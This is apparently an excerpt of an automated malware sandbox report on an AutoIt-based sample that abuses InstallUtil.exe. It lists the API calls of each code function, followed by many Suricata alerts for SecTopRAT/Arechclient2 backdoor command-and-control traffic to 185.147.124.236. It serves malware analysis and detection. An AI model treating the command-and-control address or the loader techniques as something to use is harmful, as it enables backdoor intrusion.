Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009EF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	14_2_009EF735
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009EFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	14_2_009EFA36
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_009E3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	14_2_009E3CE2
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_017568AD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,	14_2_017568AD
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_017541DD GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	14_2_017541DD
Source: C:\ahdccea\AutoIt3.exe	Code function: 14_2_017569B5 FindFirstFileA,GetLastError,	14_2_017569B5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06FDE345h		13_2_06FDDCD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 4x nop then jmp 06FDE345h		13_2_06FDE321

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:49716 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:49716
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49730 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49736 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49729 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49743 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49742 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49749 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49761 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49755 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49762 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49768 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49774 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49776 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49781 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49787 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49793 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49800 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49794 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49812 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49806 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49813 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49819 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49825 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49826 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49833 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49839 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49840 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49852 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49846 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49853 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49859 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49865 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49871 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49870 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49877 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49884 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49896 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49890 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49901 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49883 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49909 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:49921 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49914 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49903 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:49921
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49932 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49947 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49936 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49928 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49955 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49942 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49916 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49949 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49923 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49960 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49962 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49968 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:49974 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49975 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49986 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49988 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49993 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49999 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50001 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50007 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:49974
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50012 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:49980 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50019 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50025 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50030 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:50033 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50032 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50039 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50044 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50046 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50052 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50057 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:50033
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:50062 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50061 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50063 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50064 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50065 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:50062
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50066 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50067 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:50070 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:50069 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50068 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50071 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50072 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50073 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50074 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:50077 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50075 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50076 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50078 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50079 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:50083 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50081 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50082 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50084 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:50077
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50085 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50087 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50088 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:50083
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50014 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50089 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:50070
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50091 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50092 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50093 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50094 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50095 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50096 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50099 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50100 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50059 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50098 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50101 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50102 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:50104 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50103 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50086 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:50106 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50105 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50107 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:50080 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50108 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:50106
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50109 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50110 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50097 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50111 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:50104
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50112 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 185.147.124.236:15647 -> 192.168.2.5:50080
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50113 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50114 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50115 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50116 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50118 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50090 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.5:50120 -> 185.147.124.236:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50119 -> 185.147.124.236:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.5:50121 -> 185.147.124.236:9000
